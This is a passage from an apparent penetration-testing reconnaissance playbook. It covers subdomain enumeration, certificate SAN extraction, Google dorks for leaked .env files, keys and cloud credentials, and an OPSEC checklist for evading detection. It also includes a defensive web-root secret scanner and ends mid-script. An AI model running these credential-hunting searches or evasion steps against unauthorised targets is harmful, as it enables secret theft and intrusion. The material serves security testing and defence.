&lt;h3 id="pre-test-opsec-checklist" &gt;
&lt;div&gt;
&lt;a href="#pre-test-opsec-checklist"&gt;
##
&lt;/a&gt;
Pre-Test OPSEC Checklist
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] VPN/Tor active?
[ ] IP leaking? (check https://ipleak.net)
[ ] DNS leaking?
[ ] WebRTC disabled?
[ ] Generic and rotating User-Agent?
[ ] Random delay between requests?
[ ] GitHub credentials logged in only when needed?
[ ] Using Nmap -sT (SYN scan unsupported via proxy)?
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="3-passive-reconnaissance" &gt;
&lt;div&gt;
&lt;a href="#3-passive-reconnaissance"&gt;
#
&lt;/a&gt;
3. PASSIVE RECONNAISSANCE
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="dns-enumeration" &gt;
&lt;div&gt;
&lt;a href="#dns-enumeration"&gt;
##
&lt;/a&gt;
DNS Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CT logs (crt.sh) — BEST SOURCE OF SUBDOMAINS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://crt.sh/?q=%25.&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;amp;output=json&amp;#34;&lt;/span&gt; | jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[].name_value&amp;#39;&lt;/span&gt; | sed &lt;span style="color:#a6d189"&gt;&amp;#39;s/\*\.//g&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Subdomain brute force (with rate control)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; sub in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;cat ~/wordlists/subdomains.txt&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; host &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$sub&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; 2&amp;gt;/dev/null | grep &lt;span style="color:#a6d189"&gt;&amp;#34;has address&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleep 0.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DNS zone transfer (rare, but always test)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; ns in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;host -t ns &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt; -f4&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dig axfr @&lt;span style="color:#f2d5cf"&gt;$ns&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Resolve all discovered subdomains&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;IFS&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; -r d; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;ip&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;dig +short &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$d&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | head -1&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; -n &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$d&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt; &amp;lt; subdomains.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="certificate-san--hidden-subdomains-in-the-ssl-certificate" &gt;
&lt;div&gt;
&lt;a href="#certificate-san--hidden-subdomains-in-the-ssl-certificate"&gt;
###
&lt;/a&gt;
Certificate SAN — Hidden Subdomains in the SSL Certificate
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Beyond crt.sh, the server&amp;rsquo;s own SSL certificate may list additional hostnames in the &lt;strong&gt;Subject Alternative Name (SAN)&lt;/strong&gt; field that a crt.sh query scoped to one apex domain never returns: names under a sibling domain (a second TLD, another brand) or certificates issued by a private CA that were never logged at all:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Extract SANs directly from the certificate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;openssl s_client -connect target.com:443 -servername target.com &amp;lt;/dev/null 2&amp;gt;/dev/null | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; openssl x509 -noout -ext subjectAltName | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;DNS:[^,]+&amp;#39;&lt;/span&gt; | cut -d: -f2 | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Via Python (needs: pip install cryptography). With verify_mode=CERT_NONE, getpeercert() returns an empty dict, so parse the DER form instead&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python3 -c &lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;import ssl, socket
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;from cryptography import x509
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ctx = ssl.create_default_context()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ctx.check_hostname = False
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ctx.verify_mode = ssl.CERT_NONE   # accept self-signed or expired certs
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;with ctx.wrap_socket(socket.socket(), server_hostname=&amp;#39;target.com&amp;#39;) as s:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;    s.connect((&amp;#39;target.com&amp;#39;, 443))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;    der = s.getpeercert(binary_form=True)   # the dict form is empty when the cert was not verified
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;cert = x509.load_der_x509_certificate(der)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;for name in sorted(set(san.get_values_for_type(x509.DNSName))):
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;    print(name)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Extract full certificate metadata&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; | openssl s_client -connect target.com:443 -servername target.com 2&amp;gt;/dev/null | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; openssl x509 -noout -text | grep -A1 &lt;span style="color:#a6d189"&gt;&amp;#34;Subject Alternative Name&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Advantage&lt;/strong&gt;: Discovers *.gob.ar and *.gov.ar subdomains simultaneously (when the org uses both TLDs).
&lt;strong&gt;Real-world case&lt;/strong&gt;: MPF Argentina — the SSO certificate revealed &lt;code&gt;fiscales.gob.ar&lt;/code&gt;, &lt;code&gt;fiscales.gov.ar&lt;/code&gt;, &lt;code&gt;mpf.gov.ar&lt;/code&gt;, &lt;code&gt;www.fiscales.gob.ar&lt;/code&gt;, &lt;code&gt;www.fiscales.gov.ar&lt;/code&gt; that didn&amp;rsquo;t appear in conventional CT searches.&lt;/p&gt;
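&lt;p&gt;The two sources above (the crt.sh listing from the DNS enumeration block and the SAN dump from &lt;code&gt;openssl x509 -ext subjectAltName&lt;/code&gt;) are most useful when diffed against each other. The following Python does that and is an added worked example, not code from the original playbook: it normalizes crt.sh JSON (one &lt;code&gt;name_value&lt;/code&gt; entry can carry several newline-separated names, wildcards and mixed case), parses the DNS entries out of the openssl text, reports the hostnames only the certificate knew about, and derives the new suffixes that should be fed back into a second crt.sh query. The crt.sh JSON and the SAN text are constructed samples modelled on the MPF case above; the two-label suffix heuristic is an approximation, not a Public Suffix List lookup.&lt;/p&gt;

```python
import json
import re

# Constructed crt.sh ?output=json for a query scoped to one apex (%.gob.ar):
# name_value may hold several names separated by newlines, wildcards, and
# mixed case. Not real crt.sh output.
CRT_SH_SAMPLE = json.dumps([
    {"name_value": "www.fiscales.gob.ar\nfiscales.gob.ar"},
    {"name_value": "*.mpf.gob.ar"},
    {"name_value": "SSO.mpf.gob.ar"},
])

# Constructed output of: openssl x509 -noout -ext subjectAltName
SAN_TEXT = """X509v3 Subject Alternative Name:
    DNS:fiscales.gob.ar, DNS:fiscales.gov.ar, DNS:mpf.gov.ar, DNS:www.fiscales.gob.ar, DNS:www.fiscales.gov.ar, IP Address:203.0.113.10
"""


def normalize(name):
    """Lowercase, drop a wildcard label and any trailing dot."""
    name = name.strip().lower().rstrip(".")
    if name.startswith("*."):
        name = name[2:]
    return name


def names_from_crtsh(raw_json):
    """Set of hostnames from crt.sh JSON; one entry may carry many names."""
    names = set()
    for entry in json.loads(raw_json):
        for line in entry["name_value"].splitlines():
            name = normalize(line)
            if name:
                names.add(name)
    return names


def names_from_san(text):
    """Set of DNS names from the openssl SAN dump; IP, email and URI SANs are skipped."""
    return {normalize(m) for m in re.findall(r"DNS:([^,\s]+)", text)}


def suffixes(names, labels=2):
    """Last N labels of each name, e.g. 'gob.ar'. Heuristic for spotting a
    second TLD or sibling domain, not a Public Suffix List lookup."""
    return {".".join(n.split(".")[-labels:]) for n in names}


def san_only(san_text, crtsh_json):
    """Hostnames present in the certificate but missing from the CT query."""
    return sorted(names_from_san(san_text) - names_from_crtsh(crtsh_json))


def new_suffixes(san_text, crtsh_json):
    """Suffixes seen only via SAN: each is a new apex to query crt.sh for."""
    return sorted(suffixes(names_from_san(san_text)) - suffixes(names_from_crtsh(crtsh_json)))
```

&lt;p&gt;On the sample data &lt;code&gt;san_only&lt;/code&gt; returns the three &lt;code&gt;gov.ar&lt;/code&gt; hosts and &lt;code&gt;new_suffixes&lt;/code&gt; returns &lt;code&gt;gov.ar&lt;/code&gt;, which is exactly the second apex the original &lt;code&gt;%.gob.ar&lt;/code&gt; query could never have returned. Pipe the real crt.sh response and the real openssl output into the two functions and repeat the CT query for every suffix the certificate adds.&lt;/p&gt;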
&lt;h3 id="google-dorks--exposed-configs--secrets" &gt;
&lt;div&gt;
&lt;a href="#google-dorks--exposed-configs--secrets"&gt;
##
&lt;/a&gt;
Google Dorks — Exposed Configs &amp;amp; Secrets
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="high-precision-dorks" &gt;
&lt;div&gt;
&lt;a href="#high-precision-dorks"&gt;
###
&lt;/a&gt;
High-Precision Dorks
&lt;/div&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;site:$target &amp;#34;APP_KEY&amp;#34;
site:$target &amp;#34;DB_PASSWORD&amp;#34;
site:$target &amp;#34;-----BEGIN RSA PRIVATE KEY-----&amp;#34;
site:$target filetype:env
site:$target inurl:git/config
site:$target intitle:&amp;#34;index of&amp;#34; &amp;#34;.env&amp;#34;
site:$target &amp;#34;api_key&amp;#34; OR &amp;#34;apikey&amp;#34; OR &amp;#34;secret_key&amp;#34;
site:$target &amp;#34;firebase&amp;#34; &amp;#34;apiKey&amp;#34;
site:$target &amp;#34;supabase&amp;#34; &amp;#34;anon&amp;#34; &amp;#34;key&amp;#34;
site:$target inurl:&amp;#34;/.env&amp;#34; &amp;#34;DB_PASSWORD&amp;#34;
site:$target &amp;#34;client_secret&amp;#34; &amp;#34;redirect_uris&amp;#34; ext:json
site:$target &amp;#34;private_key&amp;#34; &amp;#34;client_email&amp;#34; ext:json
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="dork-for-exposed-configuration-files" &gt;
&lt;div&gt;
&lt;a href="#dork-for-exposed-configuration-files"&gt;
###
&lt;/a&gt;
Dork for Exposed Configuration Files
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Searches for ALL file extensions that may contain credentials and configurations:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;site:target.com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This covers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;logs&lt;/strong&gt; → tokens, SQL queries, emails in plain text&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;txt/conf/cnf/ini&lt;/strong&gt; → server configurations, DB hosts&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;env&lt;/strong&gt; → environment variables with credentials&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;sh&lt;/strong&gt; → scripts with hardcoded passwords&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;bak/backup/swp/old/~&lt;/strong&gt; → backup files with old versions (sometimes without sanitization)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;git/svn&lt;/strong&gt; → exposed versioned repositories&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;htpasswd/htaccess&lt;/strong&gt; → access control with hashes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;json&lt;/strong&gt; → service accounts, Firebase configs, Supabase configs&lt;/li&gt;
&lt;/ul&gt;
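&lt;p&gt;As an added example (not code from the playbook), the extension list above turned around into a pre-publish check a defender runs over a web root before it goes live: it selects files whose name falls into the dork&amp;rsquo;s extension families (dotfiles such as &lt;code&gt;.env.production&lt;/code&gt; and anything under &lt;code&gt;.git/&lt;/code&gt; or &lt;code&gt;.svn/&lt;/code&gt; are matched by name, since they have no conventional extension), scans them for credential-style assignments, and skips the placeholder values the dorks exclude with &lt;code&gt;NOT example NOT test&lt;/code&gt;. The sample web root, the &lt;code&gt;PLACEHOLDER_VALUES&lt;/code&gt; set and the regexes are constructed for the example.&lt;/p&gt;

```python
import re
from pathlib import PurePosixPath

# Extension families from the dork above (ext:log | ext:txt | ... | ext:json).
SENSITIVE_EXTENSIONS = {
    "log", "txt", "conf", "cnf", "ini", "env", "sh", "bak", "backup",
    "swp", "old", "~", "git", "svn", "htpasswd", "htaccess", "json",
}

# Constructed detection patterns: KEY=value assignments and key material.
SECRET_PATTERNS = [
    (re.compile(r"(?:DB_PASSWORD|DB_USERNAME|DB_HOST)\s*=\s*(\S+)"), "DB Config"),
    (re.compile(r"(?:APP_KEY|APP_SECRET|JWT_SECRET)\s*=\s*(\S+)"), "App/JWT Secret"),
    (re.compile(r"(?:AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)\s*=\s*(\S+)"), "AWS Key"),
    (re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"), "Private Key"),
    (re.compile(r'"private_key_id"\s*:'), "Service Account JSON"),
]

# Constructed placeholder values; a .env.example with these is not a leak.
PLACEHOLDER_VALUES = {"", "example", "changeme", "test", "xxx", "null", "secret"}


def is_sensitive_name(path):
    """True when the file name or path matches one of the dork's families."""
    p = PurePosixPath(path)
    name = p.name
    if ".git" in p.parts or ".svn" in p.parts:   # exposed repository metadata
        return True
    if name.startswith(".env") or name.endswith("~"):  # .env, .env.local, editor backups
        return True
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext in SENSITIVE_EXTENSIONS


def scan_content(text):
    """Return (label, line_number) for each secret-looking line in a file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, label in SECRET_PATTERNS:
            m = pattern.search(line)
            if m is None:
                continue
            value = m.group(1).strip('"\'') if m.groups() else None
            if value is not None and value.lower() in PLACEHOLDER_VALUES:
                continue  # placeholder, as in a committed .env.example
            findings.append((label, lineno))
    return findings


def audit_web_root(files):
    """files maps relative path to content. Returns {path: [(label, line), ...]}
    for files that must not be reachable once the web root is published."""
    report = {}
    for path, content in files.items():
        if not is_sensitive_name(path):
            continue
        hits = scan_content(content)
        if hits:
            report[path] = hits
    return report


# Constructed sample web root; none of these values are real credentials.
SAMPLE_WEB_ROOT = {
    "public/index.php": "DB_PASSWORD=not_in_scope",      # .php is not in the families
    ".env": "APP_KEY=base64:CONSTRUCTED\nDB_PASSWORD=hunter2\n",
    ".env.example": "DB_PASSWORD=changeme\nAPP_KEY=\n",  # placeholders only
    "storage/logs/laravel.log": "query failed, DB_HOST=10.0.0.5\n",
    "backup/site.bak": "-----BEGIN RSA PRIVATE KEY-----\n",
    ".git/config": '[remote "origin"]\n\turl = https://example.invalid/repo.git\n',
}

if __name__ == "__main__":
    for path, hits in audit_web_root(SAMPLE_WEB_ROOT).items():
        print(path, hits)
```

&lt;p&gt;Run against a real deployment directory by building the &lt;code&gt;files&lt;/code&gt; mapping from disk; anything the report lists should be moved out of the web root or blocked at the web server, not merely renamed, since the &lt;code&gt;bak/old/~&lt;/code&gt; families exist precisely because renamed copies get left behind.&lt;/p&gt;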
&lt;h4 id="dorks-for-specific-services" &gt;
&lt;div&gt;
&lt;a href="#dorks-for-specific-services"&gt;
###
&lt;/a&gt;
Dorks for Specific Services
&lt;/div&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;# Supabase
site:target.com &amp;#34;supabase.co&amp;#34; &amp;#34;anon_key&amp;#34; OR &amp;#34;SUPABASE_ANON_KEY&amp;#34;
# Firebase
site:target.com &amp;#34;firebase-adminsdk&amp;#34; &amp;#34;private_key_id&amp;#34; extension:json
# AWS
site:target.com &amp;#34;AKIA&amp;#34; filetype:env NOT example NOT test
# SendGrid
site:target.com &amp;#34;SG.&amp;#34; filetype:env NOT example
# MongoDB
site:target.com &amp;#34;mongodb+srv://&amp;#34; &amp;#34;password&amp;#34; extension:env NOT example NOT test
# Docker
site:target.com &amp;#34;docker-compose.yml&amp;#34; &amp;#34;environment:&amp;#34; NOT example
# CI/CD
site:target.com &amp;#34;.gitlab-ci.yml&amp;#34; &amp;#34;token&amp;#34; OR &amp;#34;secret&amp;#34;
site:target.com &amp;#34;.github/workflows&amp;#34; &amp;#34;secrets.&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="automated-secret-extraction-from-google-dorks" &gt;
&lt;div&gt;
&lt;a href="#automated-secret-extraction-from-google-dorks"&gt;
###
&lt;/a&gt;
Automated Secret Extraction from Google Dorks
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;bs4&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; BeautifulSoup
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;google_dork_search&lt;/span&gt;(dork, num_results&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;50&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Searches using Google dork and extracts secret patterns.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Use Google Custom Search API or HTML results parsing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# (direct Google scraping is blocked — use API)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Patterns to extract from results&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;EXTRACT_PATTERNS &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:DB_PASSWORD|DB_USERNAME|DB_HOST|DB_DATABASE)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;DB Config&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:APP_KEY|APP_SECRET)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;App Key&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:JWT_SECRET|JWT_KEY)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;JWT Secret&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;AWS Key&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:MAIL_PASSWORD|MAIL_USERNAME|SMTP_PASS)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;Email Config&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:REDIS_PASSWORD|REDIS_URL)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;Redis Config&amp;#39;&lt;/span&gt;),
